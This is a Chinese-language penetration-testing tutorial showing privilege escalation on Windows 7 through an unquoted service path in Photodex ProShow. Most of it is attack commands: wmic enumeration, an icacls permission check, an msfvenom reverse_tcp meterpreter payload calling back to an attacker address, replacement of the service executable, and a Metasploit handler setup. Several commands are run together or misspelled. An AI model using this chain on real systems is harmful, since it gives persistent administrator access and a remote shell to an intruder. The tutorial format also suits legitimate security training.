Windows平台下實現提權的新姿勢

新聞 09-15

在這篇文章中，我們將給大家演示如何通過無引號服務路徑來實現在Windows平台下的提權。在滲透測試的過程中，當我們以本地用戶身份生成命令Shell時，我們是無法檢查受限文件或目錄的，因此我們才需要拿到管理員訪問權。

無引號服務路徑漏洞

這個漏洞跟可執行文件的路徑有關，如果文件名中存在空格，或者文件路徑沒有包裹在雙引號之中，那攻擊者就可以用惡意exe文件替換掉原本合法的exe文件，並實現提權。

環境搭建

目標主機：Windows 7

攻擊主機：Kali Linux

首先，我們需要在目標Windows系統中下載並安裝一個名叫photodex proshow的包含漏洞的應用程序，下載鏡像可以在Exploit DB上找到。

生成目標主機

為了拿到meterpreter會話，我們至少要成功入侵目標Windows設備一次，你可以從下圖中看到，我們已經拿到了目標主機的meterpreter會話了。現在，打開命令Shell：

shell

你可以看到，我們拿到的shell訪問權是本地用戶local_user，為了拿到cmd的管理員許可權，我們就需要提權。首先，我們可以枚舉出目標主機上正在運行的所有服務，並找出那些沒有被雙引號包裹的服務路徑，這一步可以用下列命令實現：

wmic service get name,displayname,pathname,startmode |findstr /i "auto"|findstr /i /v "c:windows" |findstr /i /v """

這裡，我們枚舉出了下列路徑：

C:ProgramFilesPhotodexProShow ProducerScsiaccess.exe

這個路徑沒有被雙引號包裹，而且文件名中也存在空格。

現在，我們需要使用下列命令識別文件目錄許可權：

icacls Scsiaccess.exe

你可以看到，它給任何人都提供了寫入許可權，這也就意味著任何用戶都可以重寫該文件：

通過進程遷移實現提權

現在，我們只需要把惡意exe放在同一文件夾內，它就自動擁有管理員許可權了，當服務重啟之後，Windows將啟動這個惡意exe。

在Kali Linux中打開終端，然後通過下列命令使用msfvenom生成惡意exe Payload：

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234prependmigrate=true prepenmigrateprocess=explorer.exe -f exe >/root/Desktop/scsiaccess.exe

上面的命令將在桌面生成一個惡意exe文件，然後將該文件發送給目標主機。Payload會嘗試遷移惡意進程，如果用戶通過進程ID終止了當前進程的運行，攻擊者也不會丟失會話和Payload的控制權。

現在，用惡意exe替換掉合法的可執行文件，這裡我把合法Scsiaccess.exe重命名為了Scsiaccess.exe.orginal，並將惡意Scsiaccess.exe上傳到了同一文件夾內，然後重啟目標主機：

movescsiaccess.exe scsiaccess.exe.orginalupload/root/Desktop/ scsiaccess.exe

reboot：

與此同時，我在新的終端里開啟了多個handler監聽器來捕捉meterpreter會話：

use exploit/multi/handlermsf exploit(multi/handler) set payload windows /meterpreter/reverse_tcpmsf exploit(multi/handler) set lhost 192.168.1.107msf exploit(multi/handler) set lport 1234msf exploit(multi/handler) exploit

一段時間之後，我們就能夠拿到擁有管理員許可權的shell了：